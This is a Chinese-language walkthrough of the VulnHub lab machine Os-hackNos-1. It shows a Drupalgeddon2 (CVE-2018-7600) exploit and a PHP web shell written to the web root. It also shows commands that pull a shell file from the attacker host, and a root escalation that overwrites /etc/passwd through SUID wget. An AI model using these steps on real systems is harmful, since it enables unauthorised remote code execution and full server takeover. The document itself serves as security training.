【VulnHub】Os-hackNos-1覆盤

實驗環境：
靶機：192.168.0.10
攻擊機kali：192.168.0.11

一、信息收集

1、masscan快速掃端口發現22,80端口。

root@kali:~# masscan -p0-65535 --rate=2000 192.168.0.10

Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-02-15 11:31:19 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65536 ports/host]
Discovered open port 22/tcp on 192.168.0.10                                    
Discovered open port 80/tcp on 192.168.0.10   

2、nmap探測22,80端口的版本與漏洞

root@kali:~# nmap -sC -sV -p22,80 192.168.0.10
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-15 06:34 EST
Nmap scan report for 192.168.0.10
Host is up (0.00038s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a5:a5:17:70:4d:be:48:ad:ba:64:c1:07:a0:55:03:ea (RSA)
|   256 f2:ce:42:1c:04:b8:99:53:95:42:ab:89:22:66:9e:db (ECDSA)
|_  256 4a:7d:15:65:83:af:82:a3:12:02:21:1c:23:49:fb:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 08:00:27:EA:58:B0 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

3、入手80端口，dirb掃目錄，發現drupal。

root@kali:~# dirb http://192.168.0.10

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Feb 15 06:35:33 2020
URL_BASE: http://192.168.0.10/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.0.10/ ----
==> DIRECTORY: http://192.168.0.10/drupal/                                                           
+ http://192.168.0.10/index.html (CODE:200|SIZE:11321)                                               
+ http://192.168.0.10/server-status (CODE:403|SIZE:277)                                              
                                                                                                     
---- Entering directory: http://192.168.0.10/drupal/ ----
==> DIRECTORY: http://192.168.0.10/drupal/includes/                                                  
+ http://192.168.0.10/drupal/index.php (CODE:200|SIZE:7647)                                          
==> DIRECTORY: http://192.168.0.10/drupal/misc/                                                      
==> DIRECTORY: http://192.168.0.10/drupal/modules/                                                   
==> DIRECTORY: http://192.168.0.10/drupal/profiles/                                                  
+ http://192.168.0.10/drupal/robots.txt (CODE:200|SIZE:2189)                                         
==> DIRECTORY: http://192.168.0.10/drupal/scripts/                                                   
==> DIRECTORY: http://192.168.0.10/drupal/sites/                                                     
==> DIRECTORY: http://192.168.0.10/drupal/themes/                                                    
+ http://192.168.0.10/drupal/web.config (CODE:200|SIZE:2200)                                         
+ http://192.168.0.10/drupal/xmlrpc.php (CODE:200|SIZE:42)                                           
                                                                                                     
---- Entering directory: http://192.168.0.10/drupal/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                     
---- Entering directory: http://192.168.0.10/drupal/misc/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                     
---- Entering directory: http://192.168.0.10/drupal/modules/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                     
---- Entering directory: http://192.168.0.10/drupal/profiles/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                     
---- Entering directory: http://192.168.0.10/drupal/scripts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                     
---- Entering directory: http://192.168.0.10/drupal/sites/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                     
---- Entering directory: http://192.168.0.10/drupal/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------

4、whatweb查看版本信息，大致確定drupal 7版本。

root@kali:~# whatweb http://192.168.0.10/drupal/
http://192.168.0.10/drupal/ [200 OK] Apache[2.4.18], Content-Language[en], Country[RESERVED][ZZ], Drupal, HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[192.168.0.10], JQuery, MetaGenerator[Drupal 7 (http://drupal.org)], PasswordField[pass], Script[text/javascript], Title[Welcome to james | james], UncommonHeaders[x-content-type-options,x-generator], X-Frame-Options[SAMEORIGIN]

5、gobuster掃根目錄/和/drupal目錄下的txt文件。得到/alexander.txt和/drupal//CHANGELOG.txt兩個敏感信息文件。通過CHANGELOG.txt文件判定drupal版本號爲drupal 7.57。

root@kali:~# gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://192.168.0.10 -t 100 -x txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.0.10
[+] Threads:        100
[+] Wordlist:       /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     txt
[+] Timeout:        10s
===============================================================
2020/02/15 06:46:33 Starting gobuster
===============================================================
/drupal (Status: 301)
/alexander.txt (Status: 200)
/server-status (Status: 403)
===============================================================
2020/02/15 06:47:31 Finished
===============================================================
root@kali:~# gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://192.168.0.10/drupal/ -t 100 -x txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.0.10/drupal/
[+] Threads:        100
[+] Wordlist:       /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     txt
[+] Timeout:        10s
===============================================================
2020/02/15 06:47:40 Starting gobuster
===============================================================
/misc (Status: 301)
/themes (Status: 301)
/modules (Status: 301)
/scripts (Status: 301)
/includes (Status: 301)
/sites (Status: 301)
/profiles (Status: 301)
/README.txt (Status: 200)
/robots.txt (Status: 200)
/INSTALL.txt (Status: 200)
/LICENSE.txt (Status: 200)
/CHANGELOG.txt (Status: 200)
/COPYRIGHT.txt (Status: 200)
/UPGRADE.txt (Status: 200)
===============================================================
2020/02/15 06:48:42 Finished
===============================================================

二、getshell

1、使用msf的exploit/unix/webapp/drupal_drupalgeddon2模塊，set options中注意TARGETURI參數默認爲/，應當改爲drupal安裝目錄，此處爲/drupal，run後得到一個msf的shell。
2、手動獲取shell：在exploit-db上找到記錄2018-04-13 Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - ‘Drupalgeddon2’ Remote Code Execution WebApps PHP Hans Topo & g0tmi1k，按照提示運行得到shell，後可以通過python反彈shell，注意此處bash反彈會報錯。

root@kali:~# gem install highline	#安裝rb依賴包higline
root@kali:~# git clone https://github.com/dreadlocked/Drupalgeddon2.git
root@kali:~/Drupalgeddon2# ls
drupalgeddon2-customizable-beta.rb  drupalgeddon2.rb  README.md
root@kali:~/Drupalgeddon2# ./drupalgeddon2.rb http://192.168.0.10/drupal/
[*] --==[::#Drupalggedon2::]==--
--------------------------------------------------------------------------------
[i] Target : http://192.168.0.10/drupal/
--------------------------------------------------------------------------------
[+] Found  : http://192.168.0.10/drupal/CHANGELOG.txt    (HTTP Response: 200)
[+] Drupal!: v7.57
--------------------------------------------------------------------------------
[*] Testing: Form   (user/password)
[+] Result : Form valid
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
[*] Testing: Clean URLs
[!] Result : Clean URLs disabled (HTTP Response: 404)
[i] Isn't an issue for Drupal v7.x
--------------------------------------------------------------------------------
[*] Testing: Code Execution   (Method: name)
[i] Payload: echo SEFWERIV
[+] Result : SEFWERIV
[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!
--------------------------------------------------------------------------------
[*] Testing: Existing file   (http://192.168.0.10/drupal/shell.php)
[i] Response: HTTP 404 // Size: 5
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
[*] Testing: Writing To Web Root   (./)
[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php
[+] Result : <?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }
[+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!!
--------------------------------------------------------------------------------
[i] Fake PHP shell:   curl 'http://192.168.0.10/drupal/shell.php' -d 'c=hostname'
hackNos>> 

3、在github上搜drupal 7.57出python利用版本。-c參數執行命令，可以使用wget拉一個馬過來反彈shell。

root@kali:~# https://github.com/pimps/CVE-2018-7600.git
root@kali:~/CVE-2018-7600# python drupa7-CVE-2018-7600.py http://192.168.0.10/drupal/ -c "whoami"
()
=============================================================================
|          DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)           |
|                              by pimps                                     |
=============================================================================

[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-y-Nt9_xZdA7YysBlakHYAmSIgsMMYKL2A4sB2nfMTdE
[*] Triggering exploit to execute: whoami
www-data
root@kali:~/CVE-2018-7600# python drupa7-CVE-2018-7600.py http://192.168.0.10/drupal/ -c "wget http://192.168.0.11/phpshell.txt -O phpshell.php"

三、提權

1、使用LinEnum.sh工具，找到Possibly interesting SUID files：wget。

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@hackNos:/$ 
www-data@hackNos:/tmp$ git clone https://github.com/rebootuser/LinEnum.git
www-data@hackNos:/tmp/LinEnum$ ./LinEnum.sh
[-] SUID files:
-rwsr-xr-x 1 root root 159852 Jul  4  2017 /usr/bin/sudo
-rwsr-xr-x 1 root root 34680 May 17  2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 36288 May 17  2017 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 506200 May  9  2018 /usr/bin/wget
-rwsr-xr-x 1 root root 53128 May 17  2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 39560 May 17  2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 48264 May 17  2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 43316 May  8  2014 /bin/ping6
-rwsr-xr-x 1 root root 26492 May 16  2018 /bin/umount
-rwsr-xr-x 1 root root 157424 Jan 28  2017 /bin/ntfs-3g
-rwsr-xr-x 1 root root 34812 May 16  2018 /bin/mount
-rwsr-xr-x 1 root root 38932 May  8  2014 /bin/ping
-rwsr-xr-x 1 root root 38900 May 17  2017 /bin/su
-rwsr-xr-x 1 root root 30112 Jul 12  2016 /bin/fusermount


[+] Possibly interesting SUID files:
-rwsr-xr-x 1 root root 506200 May  9  2018 /usr/bin/wget

將靶機的/etc/passwd文件下載回kali本機。使用openssl命令生成密碼。

root@kali:~# openssl passwd -1 -salt suijishu 123456
$1$suijishu$pCi13H6xgVMoQBkitx4rg/
root@kali:~#echo 'hack:$1$suijishu$pCi13H6xgVMoQBkitx4rg/:0:0:root:/root:/bin/bash' >> passwd

在靶機上執行wget，覆蓋靶機的/etc/passwd，然後su到hack，提權成功。

www-data@hackNos:/tmp$ wget http://192.168.0.11/passwd -O /etc/passwd
/etc/passwd         100%[===================>]   1.65K  --.-KB/s    in 0.002s  
2020-02-15 18:48:32 (764 KB/s) - '/etc/passwd' saved [1685/1685]
www-data@hackNos:/tmp$ su - hack
su - hack
Password: 123456
root@hackNos:~# 

四、花絮

1、關於文件alexander.txt，可以echo | base64 -d解密後，再到解密網站解密得到james:Hacker@4514，測試後發現無法登陸。

root@hackNos:/var/www/html# cat alexander.txt
KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKysuLS0gLS0tLS0gLS0uPCsgKytbLT4gKysrPF0gPisrKy4KLS0tLS0gLS0tLjwgKysrWy0gPisrKzwgXT4rKysgKysuPCsgKysrKysgK1stPi0gLS0tLS0gLTxdPi0gLS0tLS0gLS0uPCsKKytbLT4gKysrPF0gPisrKysgKy48KysgKysrWy0gPisrKysgKzxdPi4gKysuKysgKysrKysgKy4tLS0gLS0tLjwgKysrWy0KPisrKzwgXT4rKysgKy48KysgKysrKysgWy0+LS0gLS0tLS0gPF0+LS4gPCsrK1sgLT4tLS0gPF0+LS0gLS4rLi0gLS0tLisKKysuPA==

root@hackNos:/var/www/html# echo 'KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKysuLS0gLS0tLS0gLS0uPCsgKytbLT4gKysrPF0gPisrKy4KLS0tLS0gLS0tLjwgKysrWy0gPisrKzwgXT4rKysgKysuPCsgKysrKysgK1stPi0gLS0tLS0gLTxdPi0gLS0tLS0gLS0uPCsKKytbLT4gKysrPF0gPisrKysgKy48KysgKysrWy0gPisrKysgKzxdPi4gKysuKysgKysrKysgKy4tLS0gLS0tLjwgKysrWy0KPisrKzwgXT4rKysgKy48KysgKysrKysgWy0+LS0gLS0tLS0gPF0+LS4gPCsrK1sgLT4tLS0gPF0+LS0gLS4rLi0gLS0tLisKKysuPA==' | base64 -d
<tLS0gPF0+LS4gPCsrK1sgLT4tLS0gPF0+LS0gLS4rLi0gLS0tLisKKysuPA==' | base64 -d  
+++++ +++++ [->++ +++++ +++<] >++++ ++.-- ----- --.<+ ++[-> +++<] >+++.
----- ---.< +++[- >+++< ]>+++ ++.<+ +++++ +[->- ----- -<]>- ----- --.<+
++[-> +++<] >++++ +.<++ +++[- >++++ +<]>. ++.++ +++++ +.--- ---.< +++[-
>+++< ]>+++ +.<++ +++++ [->-- ----- <]>-. <+++[ ->--- <]>-- -.+.- ---.+++.

2、在kali攻擊靶機使用python快速搭建web服務器

root@kali:~# python -m SimpleHTTPServer 80 &
[2] 4963
[1]   Killed                  python -m SimpleHTTPServer 80
root@kali:~# Serving HTTP on 0.0.0.0 port 80 ...
192.168.0.22 - - [15/Feb/2020 08:34:22] "GET / HTTP/1.1" 200 -
192.168.0.22 - - [15/Feb/2020 08:34:31] "GET /shell.txt HTTP/1.1" 200 -

3、兩條使用find查找suid的命令

www-data@hackNos:/tmp$ find / -user root -perm -4000 -print 2>/dev/null	#-perm -4000包含4000的所有文件
www-data@hackNos:/tmp$ find / -perm -u=s -type f 2>/dev/null	#-u=s 包含u=s條件的所有文件
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/i386-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/bin/pkexec
/usr/bin/at
/usr/bin/newgidmap
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/newuidmap
/usr/bin/wget